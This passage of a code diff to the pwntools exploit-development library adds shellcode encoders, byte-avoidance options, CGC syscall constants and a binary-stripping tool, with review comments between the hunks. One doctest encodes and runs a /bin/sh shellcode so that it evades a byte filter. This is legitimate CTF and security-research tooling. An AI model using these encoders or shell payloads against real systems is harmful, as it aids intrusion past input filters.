sys.argv[:]: + orig = arg + value = 'True' + + if '=' in arg: + arg, value = arg.split('=') + + if arg 
in hooks: + sys.argv.remove(orig) + hooks[arg](value) + + elif isident(arg): + sys.argv.remove(orig) + args[arg] = value + + if term_mode: + term.init() diff --git a/pwnlib/asm.py b/pwnlib/asm.py index f5555ecfe..0d7b84529 100644 --- a/pwnlib/asm.py +++ b/pwnlib/asm.py @@ -208,11 +208,15 @@ def _objdump(): def _include_header(): os = context.os arch = context.arch + include = '' if os == 'freebsd': include = 'freebsd.h' elif os == 'linux': include = 'linux/%s.h' % arch + elif os == 'cgc': + include = 'cgc/%s.h' % arch + if not include or not path.exists(path.join(_incdir, include)): log.warn_once("Could not find system include headers for %s-%s" % (arch,os)) @@ -237,7 +241,8 @@ def _arch_header(): '.arch armv7-a', '.thumb'], 'mips' : ['.set mips2', - '.set noreorder'], + '.set noreorder', + ], } return '\n'.join(prefix + headers.get(context.arch, [])) + '\n' @@ -354,7 +359,7 @@ def cpp(shellcode): return _run(cmd, code).strip('\n').rstrip() + '\n' @LocalContext -def make_elf_from_assembly(assembly, vma = 0x10000000): +def make_elf_from_assembly(assembly, vma = 0x10000000, extract=False): r""" Builds an ELF file with the specified assembly as its executable code. @@ -362,12 +367,22 @@ def make_elf_from_assembly(assembly, vma = 0x10000000): Arguments: assembly(str): Assembly + vma(int): Load address of the binary + extract(bool): Whether to return the data extracted from the file created, + or the path to it. Returns: - The path to the assembled ELF. + The path to the assembled ELF (extract=False), or the data + of the assembled ELF. """ - path = asm(assembly, vma = vma, extract = False) + if context.arch == 'thumb': + to_thumb = shellcraft.arm.to_thumb() + + if not assembly.startswith(to_thumb): + assembly = to_thumb + assembly + + path = asm(assembly, vma = vma, extract = extract) os.chmod(path, 0755) return path 
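Review bot: `arg, value = arg.split('=')` in `initialize()` raises ValueError for any argv entry whose value itself contains `=` (e.g. `KEY=a=b`), because the split then yields three parts; `arg, value = arg.split('=', 1)` keeps everything after the first `=` as the value. The local `argv = sys.argv[:]` just above the loop is never used and can be dropped. The module docstring is empty; it should state that every `PWNLIB_`-prefixed environment variable and every upper-case `NAME[=value]` argv token is consumed here (removed from `sys.argv`) and routed to `hooks` or `args`, since that behaviour is not obvious to callers of `pwn`.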
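Review bot: With the new `extract` parameter, `os.chmod(path, 0755)` in `make_elf_from_assembly` runs even when `extract=True`, in which case `asm(...)` returns the ELF contents rather than a filename, so chmod is handed file data instead of a path. Guard it with `if not extract:` before the chmod. The thumb prefix check `assembly.startswith(to_thumb)` is an exact string match, so assembly that begins with a comment or blank line before the stub may get the stub prepended a second time; if that is acceptable it deserves a comment. The `def make_elf_from_assembly` signature is in the preceding hunk, outside this one.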
@@ -413,7 +428,7 @@ def make_elf(data, vma = None, strip=True, extract=True): assembler = _assembler() linker = _linker() code = _arch_header() - code += '.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data)) + code += '.string "%s"' % ''.join('\\x%02x' % ord(c) for c in data) code += '\n' log.debug("Building ELF:\n" + code) @@ -487,7 +502,7 @@ def asm(shellcode, vma = 0, extract = True): '\xb8\x17\x00\x00\x00' >>> asm("mov rax, SYS_select", arch = 'amd64', os = 'linux') 'H\xc7\xc0\x17\x00\x00\x00' - >>> asm("ldr r0, =SYS_select", arch = 'arm', os = 'linux', bits=32) + >>> asm("mov r0, #SYS_select", arch = 'arm', os = 'linux', bits=32) 'R\x00\xa0\xe3' """ result = '' @@ -545,7 +560,8 @@ def asm(shellcode, vma = 0, extract = True): result = fd.read() except Exception: - log.exception("An error occurred while assembling:\n%s" % code) + lines = '\n'.join('%4i: %s' % (i+1,line) for (i,line) in enumerate(code.splitlines())) + log.exception("An error occurred while assembling:\n%s" % lines) else: atexit.register(lambda: shutil.rmtree(tmpdir)) diff --git a/pwnlib/commandline/asm.py b/pwnlib/commandline/asm.py index 44aa3df8e..4203971f4 100644 --- a/pwnlib/commandline/asm.py +++ b/pwnlib/commandline/asm.py @@ -40,6 +40,28 @@ help = 'The os/architecture/endianness/bits the shellcode will run in (default: linux/i386), choose from: %s' % common.choices, ) +parser.add_argument( + '-v', '--avoid', + action='append', + help = 'Encode the shellcode to avoid the listed bytes (provided as hex; default: 000a)' +) + +parser.add_argument( + '-n', '--newline', + dest='avoid', + action='append_const', + const='\n', + help = 'Encode the shellcode to avoid newlines' +) + +parser.add_argument( + '-z', '--zero', + dest='avoid', + action='append_const', + const='\x00', + help = 'Encode the shellcode to avoid NULL bytes' +) + parser.add_argument( '-d', 
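Review bot: `''.join('\\x%02x' % ord(c) for c in data)` in `make_elf` now only accepts `str`; the previous `bytearray(data)` form also accepted `bytearray` or a list of ints, which now raise TypeError on `ord(c)`. If such inputs are still expected, iterating `bytearray(data)` with `'\\x%02x' % c` handles both cases; if not, the docstring for `data` should say it must be a `str`. The rest of `make_elf` lies outside this hunk.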
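Review bot: The `-v/--avoid` help text says the bytes are "provided as hex; default: 000a", but nothing decodes hex and there is no default: `args.avoid` is `None` unless given, and the values are passed verbatim to `encode(output, args.avoid)` in the `@@ -72,6 +100,9` hunk, in the same list as the raw `'\n'` and `'\x00'` constants that `-n`/`-z` append. Either decode the `-v` values before calling `encode`, or change the help to say the bytes are given literally and drop the "default: 000a" claim. Note also that `scramble.py` in this same change joins the list with `''.join(args.avoid)` while this script passes the list itself, so the two front-ends disagree on what `encode`'s second argument is.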
@@ -48,6 +70,12 @@ action='store_true' ) +parser.add_argument( + '-e', + '--encoder', + help="Specific encoder to use" +) + parser.add_argument( '-i', '--infile', @@ -72,6 +100,9 @@ def main(): fmt = args.format or ('hex' if tty else 'raw') formatters = {'r':str, 'h':enhex, 's':repr} + if args.avoid: + output = encode(output, args.avoid) + if args.debug: proc = gdb.debug_shellcode(output, arch=context.arch) proc.interactive() @@ -84,7 +115,8 @@ def main(): if fmt[0] == 'e': args.output.write(make_elf(output)) - os.fchmod(args.output.fileno(), 0700) + try: os.fchmod(args.output.fileno(), 0700) + except OSError: pass else: args.output.write(formatters[fmt[0]](output)) diff --git a/pwnlib/commandline/common.py b/pwnlib/commandline/common.py index dd7377657..f6873d2ba 100644 --- a/pwnlib/commandline/common.py +++ b/pwnlib/commandline/common.py @@ -1,4 +1,6 @@ -from pwn import * +import sys +import pwnlib +from pwnlib.context import context pwnlib.log.console.stream = sys.stderr diff --git a/pwnlib/commandline/constgrep.py b/pwnlib/commandline/constgrep.py index ef3a30dc6..153432781 100644 --- a/pwnlib/commandline/constgrep.py +++ b/pwnlib/commandline/constgrep.py @@ -4,7 +4,9 @@ import os import re -from pwn import * +from pwnlib.context import context +from pwnlib import constants +from pwnlib.asm import cpp from . import common diff --git a/pwnlib/commandline/elfdiff.py b/pwnlib/commandline/elfdiff.py index 8f2e7c357..4d6438f67 100644 --- a/pwnlib/commandline/elfdiff.py +++ b/pwnlib/commandline/elfdiff.py @@ -3,11 +3,11 @@ from subprocess import CalledProcessError from subprocess import check_output from tempfile import NamedTemporaryFile +from pwn import * - -def dump(x): +def dump(objdump, elf): n = NamedTemporaryFile(delete=False) - o = check_output(['objdump','-d','-x','-s',x]) + o = check_output([objdump,'-d','-x','-s',elf.path]) n.write(o) n.flush() return n.name 
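Review bot: `dump()` still returns `n.name` from a `NamedTemporaryFile(delete=False)` that is never closed or deleted, so every run leaves two objdump dumps in the temp directory and an open handle until interpreter exit. Write through `with NamedTemporaryFile(delete=False) as n:` and have `main()` (next hunk) remove both paths once `diff()` has run. Since the caller now resolves `objdump`, a one-line docstring would help: `"""Dump *elf* with the given *objdump* binary to a temp file and return its path."""`.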
@@ -23,7 +23,19 @@ def diff(a,b): p.add_argument('b') def main(): - a = p.parse_args() - print diff(dump(a.a), dump(a.b)) + a = p.parse_args() + + with context.silent: + x = ELF(a.a) + y = ELF(a.b) + + if x.arch != y.arch: + log.error("Architectures are not the same: %s vs %s" % (x.arch, y.arch)) + + context.arch = x.arch + + objdump = pwnlib.asm.which_binutils('objdump') + + print diff(dump(objdump, x), dump(objdump, y)) if __name__ == '__main__': main() diff --git a/pwnlib/commandline/pwnstrip.py b/pwnlib/commandline/pwnstrip.py new file mode 100644 index 000000000..6b40fc705 --- /dev/null +++ b/pwnlib/commandline/pwnstrip.py 
@@ -0,0 +1,53 @@
+import argparse
+
+from pwn import *
+
+from . import common
+
+p = argparse.ArgumentParser(
+ description = 'Strip binaries for CTF usage',
+ formatter_class = argparse.RawDescriptionHelpFormatter,
+)
+
+g = p.add_argument_group("actions")
+g.add_argument('-b', '--build-id', help="Strip build ID", action='store_true')
+g.add_argument('-p', '--patch', metavar='FUNCTION', help="Patch function", action='append')
+p.add_argument('-o', '--output', type=file, default=sys.stdout)
+p.add_argument('file', type=file)
+
+def main():
+ args = p.parse_args()
+
+ if not (args.patch or args.build_id):
+ sys.stderr.write("Must specify at least one action\n")
+ sys.stderr.write(p.format_usage())
+ sys.exit(0)
+
+ elf = ELF(args.file.name)
+ context.clear(arch=elf.arch)
+
+ if args.build_id:
+ for offset in pwnlib.libcdb.get_build_id_offsets():
+ data = elf.read(elf.address + offset + 0xC, 4)
+ if data == 'GNU\x00':
+ elf.write(elf.address + offset + 0x10, read('/dev/urandom', 20))
+
+ for function in args.patch:
+ if function not in elf.symbols:
+ log.error("Could not find function %r" % function)
+
+ trap = asm(shellcraft.trap())
+ offset = elf.symbols[function]
+
+ elf.write(elf.address + offset, trap)
+
+ result = elf.data
+
+ if args.output.isatty():
+ result = enhex(result)
+
+ args.output.write(result)
+
+
+if __name__ == '__main__':
+ main()
diff --git a/pwnlib/commandline/scramble.py b/pwnlib/commandline/scramble.py
new file mode 100644
index 000000000..f95a6eaae
--- /dev/null
+++ b/pwnlib/commandline/scramble.py
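Review bot: `for function in args.patch:` raises TypeError when only `-b/--build-id` is given, because `args.patch` stays `None` when no `-p` is passed; use `for function in args.patch or []:`. `-o/--output` is declared with `type=file`, which opens the path read-only, so `args.output.write(result)` fails for any explicit output file — `type=argparse.FileType('w')`, as `scramble.py` in this change uses, is what is wanted. The usage-error path ends in `sys.exit(0)`; a missing action should exit non-zero so callers can tell failure from success.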
@@ -0,0 +1,103 @@ +import argparse +import sys + +from pwn import * + +from . import common + +parser = argparse.ArgumentParser( + description = 'Shellcode encoder' +) + + +parser.add_argument( + "-f", "--format", + help="Output format (defaults to hex for ttys, otherwise raw)", + choices=['raw', 'hex', 'string', 'elf'] +) + +parser.add_argument( + "-o","--output", + metavar='file', + help="Output file (defaults to stdout)", + type=argparse.FileType('w'), + default=sys.stdout +) + +parser.add_argument( + '-c', '--context', + metavar = 'context', + action = 'append', + type = common.context_arg, + choices = common.choices, + help = 'The os/architecture/endianness/bits the shellcode will run in (default: linux/i386), choose from: %s' % common.choices, +) + +parser.add_argument( + '-p', '--alphanumeric', + action='store_true', + help = 'Encode the shellcode with an alphanumeric encoder' +) + +parser.add_argument( + '-v', '--avoid', + action='append', + help = 'Encode the shellcode to avoid the listed bytes' +) + +parser.add_argument( + '-n', '--newline', + dest='avoid', + action='append_const', + const='\n', + help = 'Encode the shellcode to avoid newlines' +) + +parser.add_argument( + '-z', '--zero', + dest='avoid', + action='append_const', + const='\x00', + help = 'Encode the shellcode to avoid NULL bytes' +) + +parser.add_argument( + '-d', + '--debug', + help='Debug the shellcode with GDB', + action='store_true' +) + +def main(): + args = parser.parse_args() + tty = args.output.isatty() + + if sys.stdin.isatty(): + parser.print_usage() + sys.exit(0) + + data = sys.stdin.read() + output = data + fmt = args.format or ('hex' if tty else 'raw') + formatters = {'r':str, 'h':enhex, 's':repr} + + if args.alphanumeric: + output = alphanumeric(output) + + if args.avoid: + output = avoid(output, ''.join(args.avoid)) + + if args.debug: + proc = gdb.debug_shellcode(output, arch=context.arch) + proc.interactive() + sys.exit(0) + + if fmt[0] == 'e': + 
sys.stdout.write(make_elf(output)) + else: + args.output.write(formatters[fmt[0]](output)) + + if tty and fmt is not 'raw': + args.output.write('\n') + +if __name__ == '__main__': main() diff --git a/pwnlib/commandline/shellcraft.py b/pwnlib/commandline/shellcraft.py index e9953fac0..c874223c2 100644 --- a/pwnlib/commandline/shellcraft.py +++ b/pwnlib/commandline/shellcraft.py @@ -112,6 +112,28 @@ def _string(s): action='store_true' ) +p.add_argument( + '-v', '--avoid', + action='append', + help = 'Encode the shellcode to avoid the listed bytes' +) + +p.add_argument( + '-n', '--newline', + dest='avoid', + action='append_const', + const='\n', + help = 'Encode the shellcode to avoid newlines' +) + +p.add_argument( + '-z', '--zero', + dest='avoid', + action='append_const', + const='\x00', + help = 'Encode the shellcode to avoid NULL bytes' +) + p.add_argument( '-r', '--run', @@ -133,6 +155,27 @@ def _string(s): dest='color' ) +p.add_argument( + '--syscalls', + help="List syscalls", + action='store_true' +) + +p.add_argument( + '--address', + help="Load address", + default=None +) + +def get_template(name): + func = shellcraft + for attr in name.split('.'): + func = getattr(func, attr) + return func + +def is_not_a_syscall_template(name): + template_src = shellcraft._get_source(name) + return 'man 2' not in read(template_src) def main(): # Banner must be added here so that it doesn't appear in the autodoc @@ -141,12 +184,15 @@ def main(): args = p.parse_args() if not args.shellcode: - print '\n'.join(shellcraft.templates) + templates = shellcraft.templates + + if not args.syscalls: + templates = filter(is_not_a_syscall_template, templates) + + print '\n'.join(templates) exit() - func = shellcraft - for attr in args.shellcode.split('.'): - func = getattr(func, attr) + func = get_template(args.shellcode) if args.show: # remove doctests 
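Review bot: `if tty and fmt is not 'raw':` compares strings by identity, which only works by accident of interning; write `fmt != 'raw'`. In the `elf` branch the result goes to `sys.stdout.write(make_elf(output))` instead of `args.output`, so `-o file` is silently ignored for ELF output, whereas the sibling `asm.py` writes to `args.output` there. The `fmt[0]` / `formatters[fmt[0]]` indexing relies on the four `choices` having distinct first letters; a short comment saying so would save the next reader a double-take.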
@@ -236,13 +282,27 @@ def main(): print cpp(code) exit() + assembly = code + + vma = args.address + if vma: + vma = eval(vma) if args.format in ['e','elf']: args.format = 'default' - code = read(make_elf_from_assembly(code, vma=None)) - os.fchmod(args.out.fileno(), 0700) + try: os.fchmod(args.out.fileno(), 0700) + except OSError: pass + + + if not args.avoid: + code = read(make_elf_from_assembly(assembly, vma=vma)) + else: + code = asm(assembly) + code = encode(code, args.avoid) + code = make_elf(code, vma=vma) + # code = read(make_elf(encode(asm(code), args.avoid))) else: - code = asm(code) + code = encode(asm(assembly), args.avoid) if args.format == 'default': if args.out.isatty(): @@ -253,7 +313,10 @@ def main(): arch = args.shellcode.split('.')[0] if args.debug: - proc = gdb.debug_shellcode(code, arch=arch) + if not args.avoid: + proc = gdb.debug_assembly(assembly, arch=arch, vma=vma) + else: + proc = gdb.debug_shellcode(code, arch=arch, vma=vma) proc.interactive() sys.exit(0) diff --git a/pwnlib/constants/cgc/__init__.py b/pwnlib/constants/cgc/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/constants/cgc/aarch64.py b/pwnlib/constants/cgc/aarch64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/aarch64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/alpha.py b/pwnlib/constants/cgc/alpha.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/alpha.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/amd64.py b/pwnlib/constants/cgc/amd64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/amd64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/arm.py b/pwnlib/constants/cgc/arm.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/arm.py 
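Review bot: `vma = eval(vma)` evaluates whatever string was given to `--address` as Python, where `int(vma, 0)` is all that is needed to accept decimal and `0x`-prefixed hex and reject anything else. The commented-out `# code = read(make_elf(encode(asm(code), args.avoid)))` should be deleted rather than left beside the live code. In the non-ELF branch `encode(asm(assembly), args.avoid)` is now called even when `--avoid` was not given, so this relies on `encode` accepting `None` as its avoid set, which is not visible here and worth confirming. `main()` starts before this hunk and continues into the next one.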
@@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/i386.py b/pwnlib/constants/cgc/i386.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/i386.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/ia64.py b/pwnlib/constants/cgc/ia64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/ia64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/mips.py b/pwnlib/constants/cgc/mips.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/mips.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/powerpc.py b/pwnlib/constants/cgc/powerpc.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/powerpc.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/powerpc64.py b/pwnlib/constants/cgc/powerpc64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/powerpc64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/s390.py b/pwnlib/constants/cgc/s390.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/s390.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/s390x.py b/pwnlib/constants/cgc/s390x.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/s390x.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/sparc.py b/pwnlib/constants/cgc/sparc.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/sparc.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/sparc64.py b/pwnlib/constants/cgc/sparc64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null 
+++ b/pwnlib/constants/cgc/sparc64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/thumb.py b/pwnlib/constants/cgc/thumb.py new file mode 100644 index 000000000..108c541f3 --- /dev/null +++ b/pwnlib/constants/cgc/thumb.py @@ -0,0 +1,28 @@ +from pwnlib.constants.constant import Constant +terminate = Constant('terminate', 1) +SYS_terminate = Constant('SYS_terminate', 1) +__NR_terminate = Constant('__NR_terminate', 1) + +transmit = Constant('transmit', 2) +SYS_transmit = Constant('SYS_transmit', 2) +__NR_transmit = Constant('__NR_transmit', 2) + +receive = Constant('receive', 3) +SYS_receive = Constant('SYS_receive', 3) +__NR_receive = Constant('__NR_receive', 3) + +fdwait = Constant('fdwait', 4) +SYS_fdwait = Constant('SYS_fdwait', 4) +__NR_fdwait = Constant('__NR_fdwait', 4) + +allocate = Constant('allocate', 5) +SYS_allocate = Constant('SYS_allocate', 5) +__NR_allocate = Constant('__NR_allocate', 5) + +deallocate = Constant('deallocate', 6) +SYS_deallocate = Constant('SYS_deallocate', 6) +__NR_deallocate = Constant('__NR_deallocate', 6) + +random = Constant('random', 7) +SYS_random = Constant('SYS_random', 7) +__NR_random = Constant('__NR_random', 7) diff --git a/pwnlib/context/__init__.py b/pwnlib/context/__init__.py index 24886d718..02bfb5438 100644 --- a/pwnlib/context/__init__.py +++ b/pwnlib/context/__init__.py @@ -7,6 +7,7 @@ import collections import functools import logging +import os import platform import string import sys @@ -323,6 +324,7 @@ class ContextType(object): 'kernel': None, 'log_level': logging.INFO, 'log_file': _devnull(), + 'randomize': False, 'newline': '\n', 'os': 'linux', 'signed': False, @@ -331,7 +333,7 @@ class ContextType(object): } #: Valid values for :meth:`pwnlib.context.ContextType.os` - oses = sorted(('linux','freebsd','windows')) + oses = sorted(('linux','freebsd','windows','cgc')) big_32 = {'endian': 'big', 'bits': 32} big_64 = {'endian': 'big', 'bits': 64} 
@@ -494,6 +496,10 @@ def __exit__(a, *b, **c): return LocalContext() + @property + def silent(self): + return self.local(log_level='error') + def clear(self, *a, **kw): """ Clears the contents of the context. @@ -864,6 +870,13 @@ def os(self, os): return os + @_validator + def randomize(self, r): + """ + Global flag that lots of things should be randomized. + """ + return bool(r) + @_validator def signed(self, signed): """ @@ -923,6 +936,11 @@ def terminal(self, value): return [value] return value + @property + def abi(self): + return self._abi + + #************************************************************************* # ALIASES #************************************************************************* diff --git a/pwnlib/data/includes/cgc/aarch64.h b/pwnlib/data/includes/cgc/aarch64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/aarch64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/alpha.h b/pwnlib/data/includes/cgc/alpha.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/alpha.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/amd64.h b/pwnlib/data/includes/cgc/amd64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/amd64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/arm.h b/pwnlib/data/includes/cgc/arm.h new file mode 100644 index 000000000..34810e7ce --- /dev/null +++ b/pwnlib/data/includes/cgc/arm.h 
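Review bot: The new `abi` property returns `self._abi`, but none of the visible hunks assigns `_abi` (it is not added to the defaults table in the `@@ -323,6 +324,7` hunk either), so unless it is set elsewhere in the class, `context.abi` raises AttributeError. Both `abi` and `silent` lack docstrings while the neighbouring validators have them; for `silent`, `"""Context manager that sets log_level to 'error' for the duration of the block."""` is grounded in its body, and `abi` should say what sets `_abi`. The `randomize` docstring could also name who reads the flag — the ARM alphanumeric encoder in this change seeds `random` deterministically when it is false.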
@@ -0,0 +1,21 @@ +#define allocate 5 +#define SYS_allocate 5 +#define __NR_allocate 5 +#define deallocate 6 +#define SYS_deallocate 6 +#define __NR_deallocate 6 +#define fdwait 4 +#define SYS_fdwait 4 +#define __NR_fdwait 4 +#define random 7 +#define SYS_random 7 +#define __NR_random 7 +#define receive 3 +#define SYS_receive 3 +#define __NR_receive 3 +#define terminate 1 +#define SYS_terminate 1 +#define __NR_terminate 1 +#define transmit 2 +#define SYS_transmit 2 +#define __NR_transmit 2 diff --git a/pwnlib/data/includes/cgc/i386.h b/pwnlib/data/includes/cgc/i386.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/i386.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/ia64.h b/pwnlib/data/includes/cgc/ia64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/ia64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/mips.h b/pwnlib/data/includes/cgc/mips.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/mips.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/powerpc.h b/pwnlib/data/includes/cgc/powerpc.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/powerpc.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/powerpc64.h b/pwnlib/data/includes/cgc/powerpc64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/powerpc64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/s390.h b/pwnlib/data/includes/cgc/s390.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/s390.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file 
diff --git a/pwnlib/data/includes/cgc/s390x.h b/pwnlib/data/includes/cgc/s390x.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/s390x.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/sparc.h b/pwnlib/data/includes/cgc/sparc.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/sparc.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/sparc64.h b/pwnlib/data/includes/cgc/sparc64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/sparc64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/thumb.h b/pwnlib/data/includes/cgc/thumb.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/thumb.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/dynelf.py b/pwnlib/dynelf.py index d347687cb..ca972099c 100644 --- a/pwnlib/dynelf.py +++ b/pwnlib/dynelf.py @@ -495,6 +495,10 @@ def lookup (self, symb = None, lib = None): if lib: dynlib = self._dynamic_load_dynelf(lib) else: dynlib = self + if dynlib is None: + log.failure("Could not find %r" % lib) + return None + # # If we are resolving a symbol in the library, find it. # @@ -502,6 +506,7 @@ def lookup (self, symb = None, lib = None): # Try a quick lookup by build ID self.status("Trying lookup based on Build ID") build_id = dynlib._lookup_build_id(lib=lib) + result = None if build_id: log.info("Trying lookup based on Build ID: %s" % build_id) path = libcdb.search_by_build_id(build_id) @@ -769,6 +774,9 @@ def _lookup_build_id(self, lib = None): if lib is not None: libbase = self.lookup(symb = None, lib = lib) + if not libbase: + return None + for offset in libcdb.get_build_id_offsets(): address = libbase + offset if self.leak.d(address + 0xC) == unpack("GNU\x00", 32): 
diff --git a/pwnlib/encoders/__init__.py b/pwnlib/encoders/__init__.py
index c7c164994..31a3850fd 100644
--- a/pwnlib/encoders/__init__.py
+++ b/pwnlib/encoders/__init__.py
@@ -5,4 +5,11 @@
 from . import amd64
 from . import arm
 from . import i386
-from .encoder import *
+from . import mips
+from .encoder import alphanumeric
+from .encoder import encode
+from .encoder import Encoder
+from .encoder import line
+from .encoder import null
+from .encoder import printable
+from .encoder import scramble
diff --git a/pwnlib/encoders/amd64/__init__.py b/pwnlib/encoders/amd64/__init__.py
index e69de29bb..6614eabf9 100644
--- a/pwnlib/encoders/amd64/__init__.py
+++ b/pwnlib/encoders/amd64/__init__.py
@@ -0,0 +1 @@
+from . import delta
\ No newline at end of file
diff --git a/pwnlib/encoders/amd64/delta.py b/pwnlib/encoders/amd64/delta.py
new file mode 100644
index 000000000..208ea6d60
--- /dev/null
+++ b/pwnlib/encoders/amd64/delta.py
@@ -0,0 +1,42 @@
+from ..i386.delta import i386DeltaEncoder
+
+class amd64DeltaEncoder(i386DeltaEncoder):
+ """
+ amd64 encoder built on delta-encoding.
+
+ In addition to the loader stub, doubles the size of the shellcode.
+
+ >>> context.clear(arch='amd64')
+ >>> shellcode = asm(shellcraft.sh())
+ >>> avoid = '/bin/sh\x00'
+ >>> encoded = pwnlib.encoders.amd64.delta.encode(shellcode, avoid)
+ >>> assert not any(c in encoded for c in avoid)
+ >>> p = run_shellcode(encoded)
+ >>> p.sendline('echo hello; exit')
+ >>> p.recvline()
+ """
+ assembly = '''
+base:
+ lea rsi, base[rip]
+ /* add rsi, (data-base) */
+ .byte 0x48, 0x83, 0xc6, (data - base)
+ cld
+ mov rdi, rsi
+
+next:
+ lodsb
+ xchg eax, ebx
+ lodsb
+ sub al, bl
+ stosb
+ sub bl, 0xac
+ jnz next
+
+data:
+'''
+ arch = 'amd64'
+ raw = 'H\x8d5\xf9\xff\xff\xffH\x83\xc6\x1a\xfcH\x89\xf7\xac\x93\xac(\xd8\xaa\x80\xeb\xacu\xf5'
+ blacklist = set(raw)
+
+encode = amd64DeltaEncoder()
+__all__ = [encode]
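Review bot: `__all__ = [encode]` stores the encoder object instead of its name; `__all__` must be a list of strings, so `from pwnlib.encoders.amd64.delta import *` raises TypeError — use `__all__ = ['encode']`. `blacklist = set(raw)` is derived from the hard-coded `raw` stub bytes rather than from assembling `assembly`, so if the stub is ever edited the two can silently diverge; a comment stating that `raw` is the assembled form of `assembly` and must be regenerated together with it would make that dependency explicit. The class docstring could also note that the `sub bl, 0xac` / `.byte ... (data - base)` stub is what fixes the size of the loader, since the "doubles the size" sentence only covers the payload.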
diff --git a/pwnlib/encoders/arm/__init__.py b/pwnlib/encoders/arm/__init__.py index e69de29bb..1411fa57d 100644 --- a/pwnlib/encoders/arm/__init__.py +++ b/pwnlib/encoders/arm/__init__.py @@ -0,0 +1,2 @@ +from . import alphanumeric +from . import xor diff --git a/pwnlib/encoders/arm/alphanumeric/ARM_Instructions.py b/pwnlib/encoders/arm/alphanumeric/ARM_Instructions.py new file mode 100755 index 000000000..2ee52378e --- /dev/null +++ b/pwnlib/encoders/arm/alphanumeric/ARM_Instructions.py 
